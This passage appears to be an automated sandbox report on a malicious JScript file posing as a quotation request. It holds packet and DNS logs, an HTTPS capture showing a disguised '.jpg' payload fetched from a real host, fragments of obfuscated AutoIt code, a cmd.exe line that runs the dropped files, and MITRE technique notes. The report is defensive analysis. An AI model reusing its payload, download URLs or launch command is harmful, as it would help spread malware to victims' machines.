Feb 14, 2025 20:32:30.953963995 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.953999996 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.954005957 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.954027891 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.954046965 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.954090118 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.954315901 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.954332113 CET	443	49705	104.21.112.1	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 14, 2025 20:32:28.656162977 CET	64520	53	192.168.2.5	1.1.1.1
Feb 14, 2025 20:32:28.666627884 CET	53	64520	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 14, 2025 20:32:28.656162977 CET	192.168.2.5	1.1.1.1	0x5574	Standard query (0)	www2.0zz0.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Feb 14, 2025 20:32:28.666627884 CET	1.1.1.1	192.168.2.5	0x5574	No error (0)	www2.0zz0.com	104.21.112.1	A (IP address)	IN (0x0001)	false
Feb 14, 2025 20:32:28.666627884 CET	1.1.1.1	192.168.2.5	0x5574	No error (0)	www2.0zz0.com	104.21.80.1	A (IP address)	IN (0x0001)	false
Feb 14, 2025 20:32:28.666627884 CET	1.1.1.1	192.168.2.5	0x5574	No error (0)	www2.0zz0.com	104.21.96.1	A (IP address)	IN (0x0001)	false
Feb 14, 2025 20:32:28.666627884 CET	1.1.1.1	192.168.2.5	0x5574	No error (0)	www2.0zz0.com	104.21.64.1	A (IP address)	IN (0x0001)	false
Feb 14, 2025 20:32:28.666627884 CET	1.1.1.1	192.168.2.5	0x5574	No error (0)	www2.0zz0.com	104.21.16.1	A (IP address)	IN (0x0001)	false
Feb 14, 2025 20:32:28.666627884 CET	1.1.1.1	192.168.2.5	0x5574	No error (0)	www2.0zz0.com	104.21.32.1	A (IP address)	IN (0x0001)	false
Feb 14, 2025 20:32:28.666627884 CET	1.1.1.1	192.168.2.5	0x5574	No error (0)	www2.0zz0.com	104.21.48.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www2.0zz0.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	104.21.112.1	443	4144	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-14 19:32:29 UTC	344	OUT	GET /2025/01/31/04/672996792.jpg HTTP/1.1 Accept: / Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: www2.0zz0.com Connection: Keep-Alive
2025-02-14 19:32:29 UTC	654	IN	HTTP/1.1 403 Forbidden Date: Fri, 14 Feb 2025 19:32:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tM5bIw4WfFci4WiSx5X2u%2BIfVaJIb5bcnXMCqjheCwy96VHQRlaqfwyDtj3lqdZGgglnCJW%2BstpIwMg02uAxgwL3ZKTElE%2BqGcOSLo2H36SJq1CAhSdMScLF2nCXlu4D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15552000; includeSubDomains; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 911f7c0389bc43b3-EWR
2025-02-14 19:32:29 UTC	715	IN	Data Raw: 31 31 64 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 11dc<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2025-02-14 19:32:29 UTC	1369	IN	Data Raw: 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f Data Ascii: /cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { windo
2025-02-14 19:32:29 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 Data Ascii: <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #ff
2025-02-14 19:32:29 UTC	1127	IN	Data Raw: 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 68 69 64 64 65 6e 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 0a 20 20 20 20 20 20 59 6f 75 72 20 49 50 3a 0a 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 Data Ascii: class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class
2025-02-14 19:32:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	104.21.112.1	443	4144	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-14 19:32:29 UTC	344	OUT	GET /2025/01/31/04/195774460.jpg HTTP/1.1 Accept: / Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: www2.0zz0.com Connection: Keep-Alive
2025-02-14 19:32:30 UTC	1009	IN	HTTP/1.1 200 OK Date: Fri, 14 Feb 2025 19:32:30 GMT Content-Type: image/jpeg Content-Length: 952476 Connection: close last-modified: Fri, 31 Jan 2025 04:39:29 GMT etag: "e889c-62cf920d54ab4" Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 684 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B6ml6kEq6JOiaB0WjLrAHZIljuJCgOolYdy%2FvBvEcnAvURYcEGGyXSQ%2FMNiYYEq0xAHbCn76UurXhDZN6NB8LHJV%2B%2FRPWzqKgv7NumVxz5EbyXAnWmYDiS%2BNOBmRWKeE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15552000; includeSubDomains; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 911f7c07d933424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1605&rtt_var=611&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2812&recv_bytes=926&delivery_rate=1777236&cwnd=249&unsent_bytes=0&cid=4c01b9704d41d5a6&ts=166&x=0"
2025-02-14 19:32:30 UTC	360	IN	Data Raw: 23 4e 6f 54 72 61 79 49 63 6f 6e 0d 0a 4c 6f 63 61 6c 20 24 61 2c 20 24 62 2c 20 24 63 2c 20 24 64 2c 20 24 65 0d 0a 20 5f 6b 41 6f 4d 77 28 29 0d 0a 46 6f 72 20 24 64 20 3d 20 30 20 54 6f 20 32 35 0d 0a 20 20 20 20 49 66 20 46 61 6c 73 65 20 54 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 44 6c 6c 43 61 6c 6c 28 27 75 73 65 72 33 32 2e 64 6c 6c 27 2c 20 27 69 6e 74 27 2c 20 27 42 65 65 70 27 2c 20 27 69 6e 74 27 2c 20 33 33 34 2c 20 27 69 6e 74 27 2c 20 33 36 30 29 0d 0a 20 20 20 20 45 6e 64 49 66 0d 0a 4e 65 78 74 0d 0a 24 63 20 3d 20 24 64 20 2a 20 36 38 0d 0a 4c 6f 63 61 6c 20 24 73 74 72 33 20 3d 20 22 32 4c e5 90 8d e3 81 8c e6 9c ac 6b 5a 48 31 30 69 e5 ad 97 e8 af 95 31 6c e3 81 aa 5a 73 e6 96 87 33 6f 36 e8 aa 9e e3 81 b2 30 e8 aa 9e e3 82 bf e3 81 aa Data Ascii: #NoTrayIconLocal $a, $b, $c, $d, $e _kAoMw()For $d = 0 To 25 If False Then DllCall('user32.dll', 'int', 'Beep', 'int', 334, 'int', 360) EndIfNext$c = $d * 68Local $str3 = "2LkZH10i1lZs3o60
2025-02-14 19:32:30 UTC	1369	IN	Data Raw: a2 bc e8 af 95 70 55 e3 82 ab e3 82 bf 63 e4 bb ae e3 82 89 48 6c 43 e7 a2 bc 66 e5 90 8d e9 83 bd 44 e5 a4 a7 e4 bb ae 4b 62 68 6f 52 e6 b5 8b 79 42 39 69 79 6c 70 e6 9d b1 e6 b5 8b 48 6d e3 82 89 69 70 e4 ba ac e4 bb ae e7 a2 bc 75 34 e8 af 95 77 48 e3 82 ab e3 81 aa e3 82 ab 62 30 41 e6 bc a2 6b 6c e7 ac a6 6f 43 e7 ac a6 e5 a5 bd 5a 30 53 e4 ba ac e5 a5 bd 61 62 e3 81 b2 72 75 76 4c 31 e5 ad 97 45 e5 a5 bd e6 b5 8b 64 e6 97 a5 42 e6 97 a5 e7 ac a6 73 73 e3 81 b2 5a e6 9c ac e4 bb ae 64 e9 83 bd 51 e5 ad 97 4f e3 82 bf 61 45 35 76 64 62 e5 ad 97 4c 50 e6 9d b1 47 e6 bc a2 6a e5 90 8d 78 62 54 6d e4 ba ac e8 aa 9e 47 6c 56 43 43 e9 98 aa e5 90 8d e3 82 bf e3 81 aa 71 53 e9 98 aa 4e 67 66 e4 ba ac e4 ba ac e8 aa 9e 4c e3 82 89 38 e3 82 bf e6 b5 8b 6c e3 Data Ascii: pUcHlCfDKbhoRyB9iylpHmipu4wHb0AkloCZ0SabruvL1EdBssZdQOaE5vdbLPGjxbTmGlVCCqSNgfL8l
2025-02-14 19:32:30 UTC	1369	IN	Data Raw: ae e6 97 a5 66 53 4b 5a 71 e3 82 bf 79 36 e7 b7 a8 68 e7 ac a6 63 4a 4f e3 82 ab 67 e7 b7 a8 6d 4d e8 af 95 34 e4 ba ac 63 e5 a4 a7 e4 bd a0 43 e4 ba ac e6 9d b1 33 32 59 e3 82 ab 6f 67 43 30 e5 90 8d 45 e8 aa 9e 6d 4e e5 90 8d e3 81 aa 48 e6 96 87 e6 9d b1 49 e3 81 aa 65 e5 ad 97 49 51 35 36 74 30 47 e6 9c ac e4 ba ac 70 e7 a2 bc e3 82 89 38 54 53 e8 af 95 e6 9c ac 47 44 36 4f 68 4d e3 81 8c 49 e5 90 8d 6a 34 51 5a e7 95 8c 73 33 6e e4 ba ac 71 e5 90 8d 45 e5 a5 bd 61 e8 af 95 e3 82 ab 6b 41 62 e8 af 95 45 4c e3 82 ab 6c 35 e4 bb ae 72 e3 82 bf 5a e6 9d b1 6c e3 81 aa 34 35 55 e3 81 8c 58 e6 bc a2 5a 53 e8 aa 9e e3 81 aa e7 a2 bc 62 47 53 6a 62 4b e3 82 89 46 e7 ac a6 30 70 e7 ac a6 6b 4e e5 ad 97 76 5a e4 ba ac 36 62 69 e6 9c ac 4b 31 55 48 e3 82 89 73 Data Ascii: fSKZqy6hcJOgmM4cC32YogC0EmNHIeIQ56t0Gp8TSGD6OhMIj4QZs3nqEakAbELl5rZl45UXZSbGSjbKF0pkNvZ6biK1UHs
2025-02-14 19:32:30 UTC	1369	IN	Data Raw: 96 87 70 e4 bb ae e5 ad 97 6d 58 70 6e 41 e3 82 ab e6 b5 8b 51 33 e3 81 8c e6 b5 8b e6 9c ac 73 e6 9c ac 65 65 72 5a 65 76 69 48 e6 9c ac e6 97 a5 64 47 67 e6 9c ac 6c e3 81 8c 54 63 e3 81 aa 38 e5 90 8d e5 a4 a7 e5 ad 97 33 4e 32 6b e6 9d b1 52 e5 a5 bd 32 6d 69 69 6c 52 e4 bb ae 5a 55 54 61 e7 95 8c e3 82 bf e4 ba ac 74 43 30 65 4f 67 71 5a 55 e6 b5 8b 79 e4 ba ac 44 e6 bc a2 65 66 77 e3 81 8c 47 77 58 5a 45 e3 81 b2 48 e5 ad 97 78 58 e3 82 ab 72 66 54 e6 9c ac 74 4e e6 96 87 e7 a2 bc 76 75 7a e3 81 b2 e7 ac a6 e3 82 ab 33 e6 bc a2 5a e5 a5 bd 53 4b e3 82 bf e5 ad 97 e3 83 8a e3 82 ab 63 7a 66 57 52 78 73 35 e7 b7 a8 78 37 e8 af 95 33 49 76 e3 82 ab 43 e7 a2 bc 71 e9 83 bd 71 49 57 e3 81 8c 63 6f e3 81 8c 6b 6c 34 32 36 59 6c 74 e4 bb ae 45 7a e6 9c ac Data Ascii: pmXpnAQ3seerZeviHdGglTc83N2kR2miilRZUTatC0eOgqZUyDefwGwXZEHxXrfTtNvuz3ZSKczfWRxs5x73IvCqqIWcokl426YltEz
2025-02-14 19:32:30 UTC	1369	IN	Data Raw: 82 ab 39 e8 aa 9e e6 9d b1 50 57 78 e3 82 ab 35 44 50 41 42 33 e5 ad 97 50 64 77 e6 96 87 66 72 e5 a4 a7 e3 82 89 6e 54 66 68 56 e3 82 ab e5 a5 bd 7a 50 e6 9c ac 54 73 e3 82 ab 4f 69 e6 bc a2 e6 b5 8b 6d e7 ac a6 6c 61 e5 ad 97 51 e3 82 ab e3 83 8a e3 82 ab e4 ba ac 37 69 67 62 63 77 e7 95 8c e7 a2 bc e7 ac a6 62 e6 9c ac 44 7a e7 ac a6 45 e6 97 a5 e3 82 ab 31 77 e6 9c ac 4d 71 e5 90 8d 69 e7 a2 bc 35 75 36 5a 54 6c 6d 7a 75 e5 a5 bd 4a e6 bc a2 e6 96 87 70 48 58 6c 32 4d 6a e3 82 ab e4 ba ac 4f e5 90 8d e3 82 ab 55 77 79 e6 9d b1 55 73 69 e9 98 aa 70 e3 81 aa 30 42 62 52 53 e6 96 87 46 43 44 e8 aa 9e 6b e8 aa 9e 6a 39 47 e5 ad 97 35 6f 49 39 32 4d e3 81 b2 e3 82 89 e5 a4 a7 e5 a4 a7 e3 82 bf 65 e5 a4 a7 e5 ad 97 59 69 4e e4 bd a0 30 6c e9 83 bd 77 e3 82 Data Ascii: 9PWx5DPAB3PdwfrnTfhVzPTsOimlaQ7igbcwbDzE1wMqi5u6ZTlmzuJpHXl2MjOUwyUsip0BbRSFCDkj9G5oI92MeYiN0lw
2025-02-14 19:32:30 UTC	1369	IN	Data Raw: e9 98 aa 52 e4 bb ae 75 69 4f e6 96 87 48 e6 b5 8b 5a 75 4e 57 77 e8 aa 9e 55 66 e3 82 bf 35 5a e7 a2 bc e6 96 87 6a 74 e7 ac a6 4c 76 e6 9c ac 65 e6 9c ac 4e 37 58 46 61 70 70 6a 48 6d 74 58 78 e6 9c ac e3 82 ab e4 bb ae 37 62 59 58 e6 9c ac 4f 53 e7 ac a6 6e 75 57 4e 4e 6d e5 ad 97 e7 ac a6 65 4a 47 49 43 63 e9 98 aa 79 e7 ac a6 57 68 39 e5 ad 97 54 75 58 e3 82 ab 4d 66 67 54 63 e7 ac a6 47 51 e5 a5 bd e3 83 8a 7a 35 68 78 65 7a 30 37 e3 83 8a 35 6e 46 67 e9 98 aa 4d e6 bc a2 53 e3 82 ab 64 39 e8 af 95 45 e3 82 89 37 69 32 e9 98 aa e7 ac a6 65 34 e7 ac a6 48 73 47 e5 a4 a7 6f 5a 49 4b 66 61 48 69 78 e8 af 95 e6 b5 8b 31 5a e3 81 b2 43 57 50 67 4e 4b e4 ba ac e4 ba ac 65 4c 35 35 71 38 6d 42 34 72 e6 96 87 54 e8 aa 9e 77 64 6f e7 95 8c 30 32 76 e3 81 b2 Data Ascii: RuiOHZuNWwUf5ZjtLveN7XFappjHmtXx7bYXOSnuWNNmeJGICcyWh9TuXMfgTcGQz5hxez075nFgMSd9E7i2e4HsGoZIKfaHix1ZCWPgNKeL55q8mB4rTwdo02v
2025-02-14 19:32:30 UTC	1369	IN	Data Raw: 6c 6c 43 61 6c 6c 28 27 75 73 65 72 33 32 2e 64 6c 6c 27 2c 20 27 69 6e 74 27 2c 20 27 53 6c 65 65 70 27 2c 20 27 69 6e 74 27 2c 20 33 34 35 2c 20 27 69 6e 74 27 2c 20 36 36 30 29 0d 0a 20 20 20 20 45 6e 64 49 66 0d 0a 4e 65 78 74 0d 0a 46 6f 72 20 24 61 20 3d 20 30 20 54 6f 20 34 37 0d 0a 20 20 20 20 49 66 20 46 61 6c 73 65 20 54 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 44 6c 6c 43 61 6c 6c 28 27 75 73 65 72 33 32 2e 64 6c 6c 27 2c 20 27 69 6e 74 27 2c 20 27 4d 65 73 73 61 67 65 42 6f 78 41 27 2c 20 27 69 6e 74 27 2c 20 32 30 34 2c 20 27 69 6e 74 27 2c 20 39 30 36 29 0d 0a 20 20 20 20 45 6e 64 49 66 0d 0a 4e 65 78 74 0d 0a 46 6f 72 20 24 61 20 3d 20 30 20 54 6f 20 36 34 0d 0a 20 20 20 20 49 66 20 46 61 6c 73 65 20 54 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: llCall('user32.dll', 'int', 'Sleep', 'int', 345, 'int', 660) EndIfNextFor $a = 0 To 47 If False Then DllCall('user32.dll', 'int', 'MessageBoxA', 'int', 204, 'int', 906) EndIfNextFor $a = 0 To 64 If False Then
2025-02-14 19:32:30 UTC	1369	IN	Data Raw: 81 aa e3 82 89 52 75 61 e5 a4 a7 57 e3 82 bf 30 48 e6 bc a2 6d 54 47 6e 53 6e e4 bd a0 e8 aa 9e e3 81 8c 35 46 77 70 e4 ba ac 38 6c 4f e7 a2 bc e5 ad 97 78 4f 74 e3 81 8c e6 96 87 46 58 30 6c e7 b7 a8 e3 82 ab 79 56 44 30 42 6e e5 a5 bd 6e 49 e3 82 bf 73 34 49 e3 81 aa 36 41 49 e4 bb ae e3 82 ab 73 36 e4 bd a0 42 6f e7 b7 a8 75 e9 83 bd 7a 39 64 66 e3 83 8a 4f e3 82 ab e4 bb ae 31 6e 59 e3 82 ab e6 97 a5 6d 77 e5 ad 97 53 e7 ac a6 e7 ac a6 e3 82 bf 55 52 6a 54 e3 81 8c e7 ac a6 33 e5 90 8d e5 ad 97 77 e8 aa 9e 36 44 e6 b5 8b 32 54 51 e3 81 b2 5a e4 ba ac 73 57 6c e7 95 8c 37 64 31 e5 a4 a7 4d 6d 30 e4 ba ac 76 e6 9c ac 30 45 e3 81 8c 59 43 54 e4 bd a0 7a e3 82 89 66 e6 9c ac e3 81 8c 41 47 68 e3 82 ab 35 68 6e e8 af 95 e7 95 8c e5 90 8d 79 58 48 77 6e 50 Data Ascii: RuaW0HmTGnSn5Fwp8lOxOtFX0lyVD0BnnIs4I6AIs6Bouz9dfO1nYmwSURjT3w6D2TQZsWl7d1Mm0v0EYCTzfAGh5hnyXHwnP
2025-02-14 19:32:30 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 44 6c 6c 43 61 6c 6c 28 27 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 27 2c 20 27 69 6e 74 27 2c 20 27 42 65 65 70 27 2c 20 27 69 6e 74 27 2c 20 31 39 2c 20 27 69 6e 74 27 2c 20 32 33 35 29 0d 0a 20 20 20 20 45 6e 64 49 66 0d 0a 4e 65 78 74 0d 0a 24 62 20 3d 20 24 61 20 2d 20 39 37 0d 0a 46 6f 72 20 24 61 20 3d 20 30 20 54 6f 20 36 0d 0a 20 20 20 20 49 66 20 46 61 6c 73 65 20 54 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 44 6c 6c 43 61 6c 6c 28 27 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 27 2c 20 27 69 6e 74 27 2c 20 27 42 65 65 70 27 2c 20 27 69 6e 74 27 2c 20 35 33 36 2c 20 27 69 6e 74 27 2c 20 32 34 38 29 0d 0a 20 20 20 20 45 6e 64 49 66 0d 0a 4e 65 78 74 0d 0a 49 66 20 24 62 20 3e 20 33 35 20 54 68 65 6e 0d 0a 20 20 20 20 24 61 20 3d 20 36 0d Data Ascii: DllCall('kernel32.dll', 'int', 'Beep', 'int', 19, 'int', 235) EndIfNext$b = $a - 97For $a = 0 To 6 If False Then DllCall('kernel32.dll', 'int', 'Beep', 'int', 536, 'int', 248) EndIfNextIf $b > 35 Then $a = 6
2025-02-14 19:32:30 UTC	1369	IN	Data Raw: a6 49 e5 a4 a7 36 e6 bc a2 e6 96 87 53 e6 96 87 5a 71 e6 96 87 72 57 e4 bb ae 70 e3 82 bf e3 82 89 e7 b7 a8 e4 bb ae 6f 59 e6 97 a5 58 e5 90 8d e4 ba ac 4a 6e 72 47 44 31 38 e5 ad 97 46 34 e3 81 aa 37 72 50 e4 bb ae 6e 58 5a e6 bc a2 e6 9c ac e3 83 8a 48 e7 ac a6 33 6a 66 6e 74 6e e3 81 aa e7 b7 a8 68 e8 aa 9e 35 e6 9d b1 e4 bb ae 68 33 78 e3 82 bf 42 e5 ad 97 68 e3 81 8c 4d e5 ad 97 49 4d 49 38 6d e7 95 8c e7 b7 a8 e5 a4 a7 57 4d 62 4b 32 5a e3 82 89 52 6d 5a 6b 67 39 63 e4 ba ac 79 61 7a 6f e5 ad 97 53 e5 a4 a7 e7 b7 a8 58 e4 ba ac e3 82 ab 4d 5a 46 e3 82 89 e5 90 8d 4e e7 ac a6 4c 42 45 e3 81 8c e6 97 a5 6e 41 75 41 62 e5 a5 bd 42 32 e5 a4 a7 44 e3 82 89 7a 73 e7 ac a6 4b 73 e8 af 95 51 49 6d 44 e6 96 87 62 70 51 e6 b5 8b e6 9d b1 4d 6c 6c 6c 55 6a e3 Data Ascii: I6SZqrWpoYXJnrGD18F47rPnXZH3jfntnh5h3xBhMIMI8mWMbK2ZRmZkg9cyazoSXMZFNLBEnAuAbB2DzsKsQImDbpQMlllUj

Target ID:	0
Start time:	14:32:26
Start date:	14/02/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ-PR 1-62557 & 38929 III.js"
Imagebase:	0x7ff66b000000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:32:33
Start date:	14/02/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c ""C:\Users\user\AppData\Local\Temp\aqgeukibkal\shuv.xls" "C:\Users\user\AppData\Local\Temp\aqgeukibkal\gnldmmsk.mp3""
Imagebase:	0x7ff7e9b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:32:33
Start date:	14/02/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

